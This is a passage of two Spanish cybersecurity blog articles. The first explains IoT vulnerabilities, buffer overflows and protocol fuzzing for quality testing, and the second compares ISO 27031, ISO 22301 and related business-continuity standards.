comercializar y obtener beneficios, estas compañías, muchas de las cuales no tienen experiencia previa con dispositivos conectados a la red, pasan por alto las complicaciones del diseño y la construcción de seguridad de hardware y software debido a las "prisas" por obtener la función más nueva y más "fresca" al menor coste. Es casi una regla que los fabricantes de productos que prueban estas nuevas fronteras apliquen las mismas pautas a su selección de hardware, que cuando lo hacen a la hora de obtener ellos mismo cualquier otro producto. Los chips más antiguos, cuyos diseños se pagaron hace mucho tiempo y ahora son muy baratos, son bloques de construcción atractivos para diseños de dispositivos que solo necesitan capacidades limitadas. Actualmente la prueba del software que se está escribiendo para un electrodoméstico o juguetes para niños, tiene un solo objetivo: confirmar que funciona y que será fácil de configurar (con muchas selecciones predeterminadas, incluso contraseñas). Siendo la seguridad una idea posterior en el mejor de los casos. El hardware utilizado en la mayoría de los productos nuevos es muy antiguo y, a menudo, tiene múltiples vulnerabilidades conocidas. El software que se incluye con los dispositivos de IoT y que rara vez recibe pruebas de seguridad en profundidad casi siempre tiene su propio conjunto de problemas de seguridad. El resultado es que decenas de miles y pronto cientos de millones de dispositivos, dispositivos y juguetes instalados en las redes domésticas y comerciales estarán listos para ser vulnerados. Y una vez que se descubra una vulnerabilidad en una línea de productos ampliamente distribuida habrá miles o posiblemente cientos de miles de hogares y negocios que estarán abiertos a tener sus dispositivos IoT "secuestrados". ## Aplicaciones de IoT En el mundo doméstico, los dispositivos IoT está en todas partes: - IoT en casa: En las casas domóticas, los objetos conectados a Internet, como televisores, termostatos, luces, cerraduras e incluso frigoríficos, se están volviendo comunes. Ofrecen a los propietarios el control de los servicios y funciones del hogar sin estar realmente en casa. Los frigoríficos inteligentes pueden controlar la cantidad de leche que queda y hacer un pedido automáticamente desde nuestra tienda preferida. O por ejemplo, las secadoras nos notifican en nuestros teléfono cuando terminan. - IoT en personas: Los dispositivos portátiles orientados a la salud y la actividad física que ofrecen mediciones biométricas, como la frecuencia cardíaca, los niveles de transpiración e incluso mediciones complejas, como los niveles de oxígeno en el torrente sanguíneo, son algunos de los ejemplos de dispositivos portátiles con IoT conectados. En medicina, los dispositivos implantados quirúrgicamente informan al médico sobre el estado de salud y, en algunos casos, aceptan instrucciones del personal médico para reaccionar autónomamente. Todos estos datos se recopilan en una base de datos central propiedad del fabricante y proporcionan una secuencia de datos potencialmente pirateable. - IoT en vehículos: Los sistemas de transporte y ahora los automóviles utilizan una gran cantidad de sensores, que a menudo funcionan en combinación con el GPS para obtener el mejor punto A y B de manera segura y eficiente. Más allá de eso, los vehículos son aún más inteligentes. Sistemas de navegación a bordo, sistemas de diagnóstico que nos alertan (y al fabricante) sobre todo, desde luces defectuosas hasta presión de los neumáticos. Las empresas también ven la importancia de integrar dispositivos conectados IoT para ofrecer nuevas funciones, reducir costos y mejorar la eficiencia. - Etiquetas RFID antirrobo que ayudan a monitorizar el inventario. - Carretillas sin conductor funcionando 24x7, aumentando los niveles de producción, la mayoria de los días ;) - Los sistemas de infraestructura crítica, como los sistemas de generación y entrega de energía, los sistemas de agua y los sistemas de transporte, están incorporando más dispositivos IoT para mejorar la precisión de los datos y el control. - Las granjas usan sensores conectados para controlar los cultivos y rebaños a fin de optimizar la distribución de pesticidas, fertilizantes y alimentos. - Los dispositivos conectados a la IoT alertan a los gerentes de planta sobre equipos defectuosos o que funcionan mal. - Las cadenas de suministro enteras que abarcan varias compañías e incluso continentes están integrando sus sistemas de producción para permitir una mejor administración de máquinas y personas a través de la monitorización y el control de sus acciones o ubicaciones. Los dispositivos IoT generan y comparten gran cantidad de datos y, por lo tanto, son susceptibles a ataques maliciosos, lo que justifica las pruebas dinámicas, revisiones de código y la evaluación de vulnerabilidades en la fase de desarrollo del producto. ## Vulnerabilidades en IoT Según Gartner, se espera que la cantidad de dispositivos conectados a Internet alcance los 50 mil millones en 2020. Si bien la IoT mejorará la vida de muchas personas, la cantidad de riesgos de seguridad a los que los consumidores y las empresas se enfrentarán aumentará exponencialmente. [Imagen: Gráfico de barras de IHS sobre el crecimiento mundial de dispositivos IoT hasta 2025] Las partes interesadas en el dominio IoT enfrentan problemas de privacidad, la mayoría de las veces desconocen la situación. Como tal, los dispositivos de IoT han estado en el foco en los últimos meses debido a los controles de seguridad deficientes y a las numerosas vulnerabilidades encontradas. Algunos de los problemas comunes que han surgido debido a la propagación de IoT son: - Los usuarios de IoT dan su aprobación para la recopilación y el almacenamiento de datos sin tener la información adecuada o el conocimiento técnico. Los datos recopilados y compartidos con o perdidos por terceros eventualmente producirán una imagen detallada de nuestra vida personal que los usuarios nunca considerarían compartir con ningún extraño que conocieran en la calle. - El anonimato ha sido un problema constante en el mundo de IoT, donde las plataformas apenas le dan importancia al anonimato de los usuarios en el proceso de compartir datos. - Es probable que los ciberataques se conviertan en una amenaza cada vez más física (en lugar de simplemente virtual). Muchos dispositivos conectados a Internet, como cámaras, televisores y aparatos de cocina ya están habilitados para espiar a las personas en sus propios hogares. Dichos dispositivos acumulan una gran cantidad de datos personales, que se comparten con otros dispositivos o son retenidos en las bases de datos por las organizaciones, los mismos, propensos a ser mal utilizados. - Los dispositivos automotrices controlados por ordenador, como bocinas, frenos, motor, tablero de instrumentos y cerraduras corren el riesgo de que hackers puedan acceder a la red y manipularlos, por diversión, o por motivos económicos. - El concepto de seguridad en capas y redundancia para gestionar los riesgos relacionados con la IO todavía está en una etapa incipiente. Por ejemplo, las lecturas de los dispositivos inteligentes de salud para monitorizar la condición de un paciente pueden verse alteradas, lo que de nuevo cuando se conecta a otro dispositivo para prescribir medicamentos después del análisis, se verá comprometido y afectará adversamente el diagnóstico o tratamiento del paciente. - Existe una alta probabilidad de no obtener acceso a un sitio web o base de datos en particular cuando varios dispositivos basados ​​en IoT intentan conectarse a él, lo que resulta en insatisfacción del cliente y caídas en los ingresos. ## Pruebas estáticas y dinámicas en dispositivos IoT A medida que los dispositivos IoT se convierten en una parte integral de nuestra vida cotidiana, es crucial que estos se sometan a pruebas exhaustivas y establezcan una base mínima de seguridad. Si se realiza alguna prueba, la prueba estática es el proceso más frecuentemente implementado. Pero las pruebas estáticas no están pensadas o diseñadas para encontrar las vulnerabilidades que existen en los componentes "Plug and Play", como los procesadores y la memoria en los que se instalará la aplicación. Las pruebas dinámicas, por otro lado, son capaces de exponer tanto las debilidades del código como cualquier defecto o vulnerabilidad subyacente introducidos por el hardware y que pueden no ser visibles en el análisis estático. Además, las pruebas dinámicas a menudo resultan ser una forma más pragmática de probar los dispositivos IoT y juegan un papel fundamental en la búsqueda de vulnerabilidades que se crean cuando se usa código nuevo en procesadores antiguos. Como tal, los fabricantes que compran hardware y software de otros deben realizar pruebas dinámicas para garantizar que los dispositivos sean seguros. ## Pruebas de control de calidad para hardware y aplicaciones Los desarrolladores producen aplicaciones que, en mayor o menor grado, intercambian información al adherirse a un protocolo lo más cerca posible. El departamento de calidad prueba la funcionalidad de la aplicación contra ese protocolo en un mundo perfecto del laboratorio de pruebas. Dadas las numerosas formas en que los programadores pueden cometer errores, buscar vulnerabilidades de seguridad en un software debe ser una parte integral del proceso de desarrollo. Extrañamente, ese no es siempre el caso, ya que probar la seguridad de un producto en particular puede ser una propuesta costosa y los desarrolladores a menudo sopesan el gasto contra el coste de otros factores involucrados en la liberación del producto a los clientes. Debido a esto, incluso el software desarrollado en un entorno estrictamente consciente de los riesgos de seguridad, probablemente se publique sin haber realizado las pruebas de una forma completa. Naturalmente, cuando se lanza la aplicación, los hackers nos martirizaran con todas las formas corruptas posibles del protocolo usado para crear un error en la aplicación. Al fricionar el protocolo, es posible que encuentren la manera de desconectar la aplicación y crear un buffer overflow, el error de diseño con mayor probabilidad de ocurrencia. ¿Cómo es que los hackers encuentran oportunidades de buffer overflow que se perdieron durante el desarrollo y las pruebas de calidad en el prelanzamiento? La comunidad de hackers ha desarrollado una amplia gama de herramientas para permitir que la base encuentre nuevos exploits. Estas herramientas, fuzzers, funcionan al crear y alimentar una amplia gama de entradas inesperadas o corruptas buscando una combinación que rompa la aplicación. La producción de estas herramientas se ha convertido en una pequeña industria propia. El mundo de QA ha intentado adaptar estas herramientas de hackers rudas y listas en sus procesos de prueba con cierto éxito, pero también con muchos dolores de cabeza. La mayoría de estos fuzzers desarrollados por hackers se centran en un único tipo de debilidad del código o simplemente en un solo protocolo o incluso en una sola aplicación. En el caso de dispositivos IoT conectados, es importante que las empresas identifiquen patrones de tráfico y diferencien entre los legítimos y los maliciosos. Por ejemplo, un empleado puede descargar una aplicación aparentemente original en un smartphone que le da a su empleador, sin saber que la aplicación tiene algún tipo de malware. En tales casos, la organización debe estar preparada con un conjunto adecuado de procesos para garantizar una amplia seguridad de la forma más temprana posible. La mayoría de los dispositivos IoT vienen con credenciales predeterminadas cuando se usan por primera vez, lo que significa identidades de administrador y contraseñas conocidas. También algunos dispositivos vienen con un servidor web incorporado. Esto ayuda a los administradores a iniciar sesión y administrar el dispositivo de forma remota. Esta vulnerabilidad masiva puede atraer fácilmente a los hackers a hacer un uso indebido de los datos confidenciales disponibles. Para evitar cualquier fuga de datos, las empresas deben desarrollar un estricto proceso de asignación, donde la configuración inicial del dispositivo pueda probarse y verificar cualquier tipo de vulnerabilidad que pueda existir. Las fallas validadas que pudieron haber sido identificadas deberían corregirse, y se debería emitir una certificación de cumplimiento antes de que el dispositivo salga al mercado. Incluso después de realizar todas las pruebas de control de calidad, se deben realizar pruebas de buffer overflow, pruebas de incumplimiento de protocolos y pruebas de caja negra para reducir aún más el alcance de agregar vulnerabilidades a los dispositivos. ## Buffer overflow: vulnerabilidades generadas en el proceso de desarrollo La traducción de los requisitos durante el desarrollo de la aplicación es la primera causa de la mayoría de los errores de programación. Por ejemplo, durante el desarrollo de una aplicación para un frigorífico inteligente, un jefe de proyecto o analista traduce los requisitos del extremo deseado al equipo de programación, los programadores traducen a asignaciones de programación individuales. Los programadores luego traducen la tarea en una sintaxis adecuada para el lenguaje de programación escrito por otra persona, que a su vez un intérprete de lenguaje de programación traduce al código de máquina correspondiente. Todas estas traducciones son fuentes de posibles errores de programación durante la etapa de diseño. Los errores uno a uno, los errores de uso del lenguaje de programación, o los desbordamientos de enteros son ejemplos de errores generados por los programadores al traducir un concepto a su algoritmo apropiado. Por ejemplo, para contener 'n' elementos que tienen cada uno 'm' bytes de longitud, el programador puede decirle al programa que asigne n * m bytes. Si m * n es mayor que el número más grande que se puede representar, se asignará menos memoria de la prevista a la operación. Esto puede conducir a un desbordamiento del buffer. En otra instancia, si un programador asume que una variable contiene solo enteros positivos, pero si el entero en cuestión es realmente un entero con signo, las operaciones aritméticas pueden causar una sobrescritura del bit de la izquierda y hacer que el resultado sea un número negativo, lo que posiblemente lleve a un comportamiento "explotable". Sin embargo, no todos los errores de programación se crean por igual. Algunos permiten que los atacantes ganen algo u obtengan habilidades que aún no tenían. Pueden negar el acceso a otros usuarios al programa bloqueándolos o acceder a información que no deberían poder acceder. En algunos casos, pueden hacer que el programa ejecute cualquier comando que indiquen. Estos errores son vulnerabilidades. Otros errores, si bien pueden tener las mismas causas, no otorgarán a los atacantes ningún acceso que no tengan. Por ello, la primera tarea para un investigador de vulnerabilidad es determinar si el error de programación es simplemente un error o si puede llevar a la explotación del activo. Si un error puede conducir a la explotación, ya sea por sí mismo o cuando se usa con otro conjunto, de forma que sea una vulnerabilidad. Los desbordamientos y vulnerabilidades del buffer causados ​​por la aplicación que no verifica la disponibilidad de espacio antes de copiar datos que no son de confianza en el espacio preasignado en la memoria del sistema, terminan sobrescribiendo el contenido de la memoria fuera del buffer. Como resultado, la próxima vez que el programa examine ese espacio de memoria, verá los datos del desbordamiento en lugar de los datos originales. Si el programa intenta usar valores de esa área, lo más probable es que no vea lo que espera, cuyas consecuencias pueden variar desde un bloqueo del programa hasta otras acciones potencialmente más peligrosas como DoS o, peor aún, la ejecución de código malicioso. Un desbordamiento de buffer basado en pila puede permitir a los atacantes ejecutar código en el pc de la víctima, ya que sobrescribe las direcciones de memoria que se usarán más adelante, mientras que un "desbordamiento de pila" generalmente da como resultado un DoS, ya que intenta escribir en la memoria que no está disponible. Los fuzzers "inteligentes" multi-protocolo y variables de entorno como beSTORM son vitales para encontrar debilidades de desbordamiento de buffer no solo porque automatizan y documentan el proceso de entrega de entradas dañadas, sino también porque vigilan de cerca la respuesta inesperada de la aplicación. Por ejemplo, beSTORM probará paquetes con encabezados mal formados, manipulando el contenido del paquete y proporcionando el tipo de datos que la aplicación puede estar buscando, usando &, <,>, puntos y comas completos dentro de aplicaciones de correo electrónico, o símbolos URL típicos para servidores HTTP, siendo inviable si se hace de forma manual. ## Vulnerabilidades en las comunicaciones API Las API de protocolo de dispositivo permiten que las aplicaciones hablen con un dispositivo a través de los protocolos estándar de la industria. Los desarrolladores necesitan simplemente identificar el dispositivo y luego abrir un canal de comunicación hacia él. Al abrir un canal, se solicita autorización de acceso. Este es un paso crítico para ayudar a evitar que los programas se comuniquen accidental o maliciosamente con uno o más dispositivos sin que el usuario se dé cuenta. Una vez que se concede el acceso, el programa puede comunicarse con un dispositivo, lo que incluye iniciar largas transferencias de datos. Ser capaz de atacar la implementación real del protocolo generando vectores de ataque que se enfocan en errores básicos de codificación tales como mal manejo de validación de entrada o verificación fronteriza (errores de programación defensiva), defectos de diseño (lógica, especificación de diseño y similares) y la implementación de la protocolo en sí, es cómo los hacker logran mejores resultados. El problema principal con eso es la cantidad de posibles combinaciones de ataque que aumentan en un factor significativo, lo que hace que el tiempo hasta el resultado (bloqueo o similar) sea poco práctico en algunos casos. Este problema se resuelve mediante el uso de algoritmos avanzados en un intento de agilizar los ataques que son más propensos a causar un error primero, y luego proceden a cubrir todo el espacio de combinación. Aún así, estos algoritmos no son fáciles de desarrollar. En algunas ocasiones, tratar de explotar un gran buffer o enviar datos del tipo de datos incorrecto facilita las capturas, pero cuanto más el fuzzer avanza en su búsqueda, más importante es la eficiencia de los algoritmos utilizados por los fuzzers individuales. El uso de manipulaciones más avanzadas basadas en los dos tipos básicos (manipulación del valor y manipulación del protocolo) también afecta considerablemente la capacidad de los fuzzers de hoy en día para proporcionar resultados. Por ejemplo, intentar explotar una falla lógica en el programa enviando dos veces una solicitud de inicio de sesión y luego combinarla en el crisol de ataques aumenta la cantidad de combinaciones requeridas y la tasa de éxito. Ser capaz de trabajar con protocolos más avanzados, que requieren que el fuzzer espere una respuesta antes de enviar la siguiente solicitud (básicamente establecer sesiones con el fuzzing basado en la sesión de la aplicación atacada) es otro paso en el fuzzing. Algunas técnicas de manipulación más avanzadas basadas en los conjuntos básicos aumentan aún más los resultados finales y el éxito del fuzzing. Una de esas técnicas avanzadas es la manipulación lógica. Basado en la manipulación del protocolo, el fuzzer intenta encontrar errores de programación lógica que resultan en una vulnerabilidad potencial. Otra técnica avanzada es la manipulación de sesiones (también basada en la manipulación de protocolos), que manipula la sesión real. Por ejemplo, enviar una solicitud para que se emita una clave, y luego cuando se recibe usando otra o continuar sin ella puede causar otros tipos de posibles errores. El principal desafío al que se enfrentan los fuzzers de segunda generación cuando emplean estas nuevas técnicas es el tiempo requerido para cubrir el espacio combinado de manera exhaustiva. Algunas vulnerabilidades "exóticas" en un producto pueden ubicarse al final del espacio de combinación. El desarrollo de la tecnología para tratar de encontrar los vectores de ataque más probables para desencadenar posibles vulnerabilidades en el menor tiempo posible es la solución. ## Prueba de caja negra: fuzzing basado en protocolo para VA y pruebas de aplicación Esta es una técnica que funciona alimentando automáticamente un programa con múltiples iteraciones de entrada que están especialmente construidas de tal forma que desencadenan un error interno indicativo de un error y posiblemente lo bloqueen. Comúnmente conocida como técnica "fault injection", las pruebas de blackbox se pueden aplicar a un servicio de red tanto como a una CPU, un smartphone, parámetros de programa, una API, un navegador web o un tipo de archivo. Los probadores que no conocen el funcionamiento interno de la aplicación que se está probando realizan su trabajo "olfateando" primero el tráfico en los protocolos de destino, generan iteraciones de entrada a partir de lo que observan y luego envían mensajes 'Random' o 'Garbled' y eventos de teclado en la aplicación hasta que surjan vulnerabilidades. La monitorización de la aplicación puede variar de un Watchdog que ve si el programa todavía se está ejecutando a una verificación remota para ver si el servicio todavía está disponible y responde o técnicas más avanzadas como mirar con un depurador una excepción anticipada. Mediante la manipulación de valores, solo se prueba un conjunto de datos específico para cambios de valores específicos y, a través de la manipulación de protocolos, se puede probar la implementación de toda la estructura del protocolo o ambas dos. La solución es detectar fallas de la aplicación durante el desarrollo utilizando el mejor fuzzer que podamos obtener, cuando la corrección es relativamente fácil y mucho menos costosa. Mediante la aplicación de técnicas de fuzzing basadas en protocolos automatizados, cómo poderosas herramientas de auditoría automatizada, debemos probar virtualmente todas las combinaciones de ataques, iniciando inteligentemente los escenarios más probables y detectando anomalías en las aplicaciones, que indican un ataque exitoso. De esta forma, los agujeros de seguridad se pueden encontrar en la aplicación mucho más rápido, sin pruebas de fuerza bruta y casi sin intervención del usuario. --- # Comparación de algunos estandares de continuidad de negocio URL: https://ciberseguridad.blog/comparacion-de-algunos-estandares-de-continuidad-de-negocio/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-07-28 Actualizado: 2026-10-08 Tema: Compliance > Cualquier estándar de continuidad de negocio se puede usar en una organización. Conoce cómo implantarlos y sus similitudes, para que elijas el mejor. Muchas organizaciones luchan por definir el mejor método para cumplir las expectativas comerciales relacionadas con la recuperación ante desastres de la tecnología de la información. La ISO 27031 brinda orientación de continuidad de negocio y recuperación ante desastres TI sobre cómo planificar la continuidad y recuperación TI como parte de un sistema de gestión de continuidad de negocio. El estándar ayuda al personal de TI a identificar los requisitos para la tecnología de la información y la comunicación e implementar estrategias para reducir el riesgo de interrupción, así como reconocer, responder y recuperarse de una interrupción de las TIC. La ISO 27031 introduce un enfoque de sistemas de gestión para abordar las TIC apoyado en un sistema de gestión de continuidad empresarial más amplio, como se describe en la ISO 22301. La ISO 27031 describe un sistema de gestión para la disponibilidad de TIC y la continuidad del negocio. Un IRBC es un sistema de gestión centrado en la recuperación de desastres de TI. IRBC utiliza el mismo modelo de Planificar-Hacer-Verificar-Actuar (PDCA) que el sistema de gestión de la continuidad del negocio describe en la ISO 22301. El objetivo es implementar estrategias que reduzcan el riesgo de interrupción de los servicios TIC, así como responder y recuperarse de una interrupción. Como norma de orientación, las organizaciones no pueden certificarse en ISO 27031 como si lo hiciese para la ISO 22301. El siguiente diagrama muestra el sistema de gestión detallado en ISO 27031: [Imagen: Diagrama circular Plan-Do-Check-Act del sistema de gestión de continuidad de negocio TIC] La ISO 27031 utiliza el mismo sistema de gestión de PDCA básico utilizado que utiliza la ISO 22301, pero lo adapta para adaptarse a la naturaleza técnica del plan de continuidad de negocio. Además de los cambios técnicos en el PDCA, la ISO 27031 también se basa en las conclusiones del Análisis de Impacto Empresarial (BIA) desarrolladas y aprobadas como parte de un plan de continuidad más amplio para una organización. En el plan de continuidad de negocio, el sistema de gestión de PDCA se desglosa de la siguiente manera: 1. Plan:La fase Plan crea y actualiza la estructura de gobierno para el sistema general de gestión IRBC. Los resultados clave de la fase del Plan son una política de Continuidad de Negocio que aborda adecuadamente la continuidad de la tecnología de información y comunicación así cómo las opciones de estrategia que la organización puede implementar para cumplir con los requisitos del negocio. 2. Hacer:La fase Do se centra en realizar actividades e implementar soluciones que permitan a la organización monitorizar, responder y recuperarse de una interrupción en los servicios TIC. Los productos clave para la fase Do son la implementación de estrategias, la generación de planes y la ejecución de actividades de capacitación y sensibilización para promover la continuidad de los servicios de TIC. 3. Verificación: La fase de verificación incluye la revisión y evaluación del rendimiento del sistema de gestión de continuidad de negocio. Los principales resultados de la fase de verificación incluyen la monitorización continua de las tecnologías de información y comunicación sobre las interrupciones y los niveles de rendimiento, así como revisiones periódicas de la capacidad de respuesta y recuperación de las TIC. 4. Actuar:La fase de actuar, brinda a la administración la oportunidad de revisar el desempeño del esfuerzo del plan de continuidad de negocio, así como dirigir la implementación de acciones correctivas que mejorarán el desempeño del sistema de gestión y / o reducirán el riesgo de futuras interrupciones en los servicios TIC. Si analizamos más en profundidad cada fase: ## Planificar el plan de continuidad de negocio Es posible que muchas organizaciones ya realicen algunos de los componentes del "Plan" de la ISO 27031 como parte de sus programas de recuperación de desastres de tecnología de la información. La ISO 27031 considera el plan de continuidad TI como un componente del plan de continuidad de negocio, pero en realidad, existen muy pocas diferencias. En la fase Planificación, la organización implementa una política para gobernar los procesos y requisitos del plan de continuidad del negocio. La política establece la estructura de gobierno para el sistema de gestión de incidentes. El plan de continuidad de negocio utiliza las aportaciones del BIA de la organización para traducir los requisitos del negocio en requisitos de rendimiento de las TIC para los servicios de TIC. La fase de Planificación concluye con la generación de opciones de estrategia de continuidad, que se implementará en la fase de Hacer (Do). Formular la estrategia significa esencialmente la creación de ofertas de servicios de TI que el personal de TIC incluirá en el catálogo de servicios o, más genéricamente, como opciones para la consideración y selección de negocios. Por ejemplo, una organización con una entrada de catálogo de servicios para un servidor virtual agregaría entradas para abordar la capacidad de recuperación de un servidor virtual a través de una variedad de medios para abordar un rango de objetivos de recuperación. La organización puede elegir proporcionar dos estrategias de recuperación para la recuperación de una máquina virtual con diferentes tiempos de recuperación para cumplir con los requisitos comerciales identificados a través de la BIA. Esas dos estrategias de recuperación se incorporaran en el catálogo de servicios de la organización como entradas separadas o incorporadas a las entradas existentes del catálogo de servicios. Para ser eficaz, ISO 27031 establece que las estrategias del plan de continuidad descritas anteriormente deben incorporar seis componentes en la monitorización, respuesta y recuperación de las interrupciones de las tecnologías de la información y la comunicación. Los seis componentes son: 1. Habilidad y conocimiento: Las estrategias de recuperación incluyen la consideración de las habilidades técnicas especializadas y el conocimiento necesario para operar los servicios de TIC antes, durante y después de una interrupción. Las estrategias que incluyen las habilidades y las consideraciones de conocimiento se centran en garantizar que ningún individuo posea las habilidades o conocimientos especializados que serían necesarios para operar los sistemas de TIC de la organización. 2. Instalaciones: Las estrategias de recuperación incluyen un riesgo mitigador asociado con la operación de sistemas TIC basados ​​en una sola instalación. Las estrategias que incluyen consideraciones sobre las instalaciones aseguran que los sistemas TIC se puedan operar incluso si una instalación primaria se vuelve inoperable. 3. Tecnología: Las estrategias de recuperación incluyen la consideración de los requisitos técnicos necesarios para cumplir con los requisitos de recuperación de la organización, específicamente el Objetivo de tiempo de recuperación (RTO) y el Punto Objetivo de Recuperación (RPO). Las estrategias que incluyen consideraciones tecnológicas implican garantizar que el hardware y las aplicaciones puedan recuperarse dentro del tiempo y la recuperación de datos requeridos por la organización. Estas consideraciones deben incluir sistemas de soporte tales como energía, enfriamiento, personal, soporte de proveedores, conectividad WAN, etc. 4. Datos: Las estrategias de recuperación incluyen la consideración de cómo proteger los datos requeridos por la organización. Las estrategias que incluyen consideraciones de datos incluyen seguridad, validez y disponibilidad de los datos requeridos por los usuarios finales. 5. Procesos: Las estrategias de recuperación incluyen la consideración de cómo mantener los procesos necesarios para monitorizar, operar y recuperar los sistemas de TIC con el fin de cumplir con los requisitos del negocio. Las estrategias que consideran los procesos identifican los procesos de TIC necesarios antes, durante y después de una interrupción en los sistemas TIC. 6. Proveedores: Las estrategias de recuperación incluyen la consideración de cómo informar e involucrar a los proveedores que se necesitan para recuperar y operar los sistemas TIC. Las estrategias que incluyen consideraciones del proveedor identifican qué proveedores participaran en la operación y recuperación de los sistemas TIC antes, durante y después de que se haya producido una interrupción. Cada opción de estrategia del plan de continuidad de negocio tendrá en cuenta los seis componentes y, a menudo, dará lugar a la creación de niveles para clasificar la información y la tecnología de comunicación que satisfaga las necesidades de la organización. Durante la fase Hacer (Do), los servicios de TIC se asignarán a un nivel, que permite la selección de estrategias. Una vez que TI identifica las opciones de estrategia, la administración de la organización debe considerar la cantidad de riesgo reducido por la estrategia contra el costo de implementación de la estrategia. En general, el resultado de la fase del Plan es una lista de estrategias para agregar o actualizar en el catálogo de servicios, que permite a la organización seleccionar el nivel adecuado de capacidad de recuperación. ## Hacer el plan de continuidad de negocio La fase Do del plan de continuidad de negocio, incluye la implementación de las estrategias identificadas en la fase de Planificación, la redacción de planes de recuperación para servicios TIC y la ejecución de actividades de capacitación y sensibilización para garantizar que el personal involucrado en el plan, esté calificado e informado. El programa implementa las estrategias apropiadas identificadas en la fase de Planificación para mejorar la preparación de TIC para los servicios de tecnología de la información y la comunicación dentro del alcance. Las estrategias que reducen el riesgo de una interrupción no eliminarán completamente la posibilidad de una interrupción en la tecnología de la información y la comunicación. El personal de TI implementa estrategias y proyectos de planes para superar el riesgo residual cuando los incidentes disruptivos se hacen realidad. La documentación del plan de respuesta y recuperación es necesaria para garantizar que el personal comprenda las actividades necesarias para cumplir con las expectativas del negocio. La ISO 27031 incluye muchas de las mismas consideraciones que se utilizan en la ISO 22301, alguno de estos puntos comunes son: - Propósito y alcance del plan - Funciones y responsabilidades definidas - Personal alterno - Criterios de invocación del plan - Información de contacto. La parte final de la fase Do es realizar actividades de capacitación y sensibilización para garantizar que el personal involucrado en el sistema de gestión del plan de continuidad de negocio (incluidos aquellos con roles en los planes de respuesta y recuperación) conozcan sus responsabilidades antes, durante y después de una interrupción. ## Verificar el plan de continuidad de negocio La fase de verificación del sistema de gestión incluye las actividades típicas asociadas con la fase de verificación del sistema del plan de continuidad, incluida la revisión de la gestión, las pruebas y el ejercicio. La fase Check también agrega actividades continuas que supervisan la interrupción de los servicios TIC y miden el rendimiento relacionado con la preparación para las TIC. ## Actuar en el plan de continuidad de negocio La fase del Actuar incorpora la revisión de la gestión del programa de preparación de las TIC para la continuidad de negocio, que incluye el rendimiento del programa, el rendimiento de preparación de las TIC y la asignación de recursos. Además de la revisión de la administración, el programa implementa acciones correctivas que se identificaron durante otras fases del sistema de gestión. El objetivo de las acciones correctivas es inculcar una cultura de mejora continua en la organización e involucrar a la gerencia con la priorización de la mejora continua. ## Estándares de seguridad de la información y continuidad del negocio ### ISO / IEC 27001 El estándar ISO 27001 se considera el estándar de seguridad de la información fundamental porque define los conceptos básicos de "construcción" y control de un SGSI; esta es la única norma de seguridad de la información certificable. ### ISO / IEC 27002 ISO / IEC 27002 (anteriormente ISO / IEC 17799): esta norma proporciona una descripción más detallada de la implementación de controles, y se aplica principalmente en la fase Do (implementación) de ISO 27001. ### ISO / IEC 27003 ISO / IEC 27003: 2010 se centra en los aspectos críticos necesarios para el diseño e implementación exitosos de un Sistema de gestión de seguridad de la información (ISMS) de acuerdo con ISO / IEC 27001: 2005. ### ISO / IEC 27004 ISO / IEC 27004: 2009 proporciona orientación sobre el desarrollo y uso de medidas y mediciones para evaluar la efectividad de un sistema de gestión de la seguridad de la información (ISMS) implementado y controles o grupos de controles, como se especifica en ISO / IEC 27001. ### ISO / IEC 27005 ISO / IEC 27005 especifica métodos para la evaluación y el tratamiento del riesgo de la información, y es útil en la fase del plan de acuerdo con ISO 27001. ### ISO / IEC TR 27008: 2011 ISO / IEC TR 27008: 2011 proporciona orientación sobre la revisión de la implementación y operación de controles, incluida la verificación de cumplimiento técnico de los controles del sistema de información, de conformidad con los estándares de seguridad de la información establecidos por una organización. ### ISO / IEC 24762: 2008 ISO / IEC 24762: 2008 Tecnología de información - Técnicas de seguridad - Pautas para servicios de recuperación de desastres de tecnología de información y comunicaciones es el estándar internacional que ofrece pautas sobre la provisión de servicios de recuperación de desastres de TIC como parte de la gestión de continuidad de negocio (BCM). ### ISO / IEC 27031: 2011 ISO / IEC 27031 - Directrices para la preparación de TIC para la continuidad del negocio. Esta norma ha reemplazado a la BS 25777 y describe los conceptos y principios de la tecnología de información y comunicación (TIC) para la continuidad del negocio y proporciona un marco de métodos y procesos para identificar y especificar todos los aspectos para mejorar la disponibilidad de TIC de una organización. ### ISO / IEC 27035 Normas de sistemas de gestión ISO / IEC 27035 - Seguridad de la información - Gestión de incidentes de seguridad de la información ### ISO 31000: 2009 Norma de gestión de riesgos ISO 31000: 2009: ISO 31000 proporciona principios de alto nivel y directrices genéricas para la gestión de riesgos. ### ISO / IEC 38500: 2008 ISO / IEC 38500: 2008 Gobierno corporativo de la tecnología de la información: esta norma proporciona principios rectores para los directores de las organizaciones sobre el uso eficaz, eficiente y aceptable de la tecnología de la información (TI) dentro de sus organizaciones. Se aplica al gobierno de los procesos de gestión (y decisiones) relacionados con los servicios de información y comunicación utilizados por una organización. Estos procesos podrían ser controlados por especialistas de TI dentro de la organización o proveedores de servicios externos, o por unidades de negocios dentro de la organización. ### BS 7858: 2006 + A2: 2009 BS 7858: 2006 + Enmienda 2: 2009 Evaluación de seguridad de las personas empleadas en un entorno de seguridad - Código de prácticas. BS 7858 es un estándar de seguridad clave que le indica cómo examinar al personal antes de emplearlo. La BS 7858 brinda recomendaciones para el examen de seguridad de las personas que se emplearán en un entorno en el que la seguridad y protección de las personas, bienes o propiedades es de extrema importancia. También se aplica cuando hay un requisito de las operaciones de la organización empleadora y / o cuando dicho examen de seguridad es de interés público. ### BS 25999-1 La BS 25999-1 proporciona pautas para la implementación de cada elemento de continuidad del negocio. ### ISO 22301 El estándar ISO 22301 ha reemplazado a BS 25999-2, y se considera el estándar de continuidad empresarial fundamental porque define los conceptos básicos para desarrollar y administrar el BCMS; este es el único estándar de continuidad empresarial certificable. Es útil en la fase Do según la norma ISO 27001 para la implementación de los requisitos dados en su Anexo A Cap. 14 (gestión de la continuidad del negocio). ### BS 25999-2 Este estándar fue reemplazado por ISO 22301. ### BS 25777: 2008 BS 25777: 2008 Gestión de la continuidad de la tecnología de la información y las comunicaciones. Código de prácticas. Este estándar es reemplazado por ISO 27031. ### PD 25111: 2010 PD 25111: 2010 Gestión de continuidad del negocio - Orientación sobre aspectos humanos de la continuidad del negocio. Proporciona orientación sobre la planificación y desarrollo de estrategias y políticas de recursos humanos para las fases clave tras una interrupción: Hacer frente a los efectos inmediatos del incidente Gestión de personas durante el período de interrupción (la etapa de continuidad), y el personal de apoyo después de la recuperación de las operaciones normales. ### PD 25666: 2010 PD 25666: 2010 Gestión de la continuidad del negocio - Orientación 